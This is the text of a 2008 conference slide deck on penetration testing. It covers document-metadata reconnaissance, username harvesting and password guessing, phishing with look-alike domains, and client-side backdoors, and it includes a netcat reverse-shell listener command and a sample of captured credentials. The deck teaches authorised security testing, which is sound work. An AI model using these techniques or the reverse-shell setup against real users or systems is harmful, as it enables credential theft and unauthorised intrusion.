Documente Academic
Documente Profesional
Documente Cultură
Lenny Zeltser
Security Consultant, SAVVIS
Senior Faculty Member, SANS Institute
Handler, SANS Internet Storm Center
August 2008
Pen testing usually involves locating
and exploiting software bugs.
2
© 2008 Lenny Zeltser
Attack surface of many server
environments is very limited.
3
© 2008 Lenny Zeltser
Consider 4 techniques for going
beyond the front-line approach.
4
#1: Data in plain sight
5
Google
site:example.com filetype:pdf
site:example.com filetype:ppt
site:example.com filetype:doc
6
© 2008 Lenny Zeltser
7
© 2008 Lenny Zeltser
libextractor
$ extract overview.ppt
paragraph count - 2
last saved by - Lenny Zeltser
title - Project overview
creation date - 2008-03-14T01:58:53Z
creator - John Smith
word count - 5
date - 2008-03-14T04:56:57Z
generator - Microsoft Office PowerPoint
8
© 2008 Lenny Zeltser
9
© 2008 Lenny Zeltser
Google + libextractor = Metagoofil
Usernames found:
================
Lenny Zeltser (www.zeltser.com)
10
© 2008 Lenny Zeltser
Finding documents via Maltego
11
© 2008 Lenny Zeltser
Finding interesting files via Maltego
12
© 2008 Lenny Zeltser
#2: Remote Password-Guessing
13
Potential usernames: ranked
word lists
http://www.census.gov/genealogy/names/names_files.html
14
© 2008 Lenny Zeltser
Potential usernames: theHarvester
15
© 2008 Lenny Zeltser
Wrong username vs. password
16
© 2008 Lenny Zeltser
Confirm usernames with Brutus by
varying only usernames.
Many One
17
© 2008 Lenny Zeltser
A head-on brute-force password
attack will probably fail.
18
© 2008 Lenny Zeltser
Some common generic passwords
19
© 2008 Lenny Zeltser
Best results with a company-
specific dictionary file
Briefly
Britain
British
brother
browser
Bugtraq
Bugbear
bundled
20
© 2008 Lenny Zeltser
Password recovery mechanisms are
weak links.
21
© 2008 Lenny Zeltser
Also, “secret question” recovery is a
prime candidate for attack.
22
© 2008 Lenny Zeltser
Letting users select their own
questions is particularly weak.
23
© 2008 Lenny Zeltser
Use LDAP if you find it—much faster
authentication.
24
© 2008 Lenny Zeltser
Brute-force Remote Desktop
credentials with TSGrinder.
25
© 2008 Lenny Zeltser
TSGrinder is slow, and requires an
older Remote Desktop client (v5).
26
© 2008 Lenny Zeltser
#3: Social engineering
27
Tricking employees to release
information works too well.
28
© 2008 Lenny Zeltser
Email phishing-style campaigns can
obtain logon credentials.
29
© 2008 Lenny Zeltser
ArGoSoft Mail Server Freeware
helps relay spoofed email.
30
© 2008 Lenny Zeltser
You can register a domain that
resembles that of the target.
http://www.domaintools.com/domain-typo
xeample.com
eaxmple.com
exampe.net
exapmle.com
eaxmple.com
wwwexample.co
m
exampel.com
31
© 2008 Lenny Zeltser
Too many users will give up their
logon credentials.
32
© 2008 Lenny Zeltser
The site can also capture client-side
details for follow-on attacks.
USER: jsmith
PASSWORD: plumlips
LOCAL IP: 192.168.2.144
REMOTE IP: 208.77.188.166
PORT: 61035
USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1;
Mozilla Default Plug-in; RealJukebox NS Plugin;
RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit);
Shockwave Flash; Java(TM) Platform SE 6 U2;
33
© 2008 Lenny Zeltser
#4: Client-Side Backdoors
34
Keeping up with security patches on
laptops and desktops is hard.
35
© 2008 Lenny Zeltser
Tools such as Core Impact and
Metasploit help target client-side
vulnerabilities.
36
© 2008 Lenny Zeltser
It may be more effective just to ask
the user to install the backdoor.
37
© 2008 Lenny Zeltser
The backdoor can connect to the
attacking system via reverse-shell.
$ C:\attacker> nc -l -p 80
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rights
reserved
C:\Windows\Temp> dir
...
38
© 2008 Lenny Zeltser
Metasploit can generate stand-alone
payloads. Example: Reverse-VNC.
39
© 2008 Lenny Zeltser
Reverse-VNC can control a system
even if it is behind a firewall.
40
© 2008 Lenny Zeltser
A system compromise
is just a means to an end.
41
© 2008 Lenny Zeltser
Consider previous scenarios when
defining your rules of engagement.
42
© 2008 Lenny Zeltser
These approaches increase the
chances of a “successful” pen test.
43
© 2008 Lenny Zeltser
Lenny Zeltser
www.zeltser.com
44
© 2008 Lenny Zeltser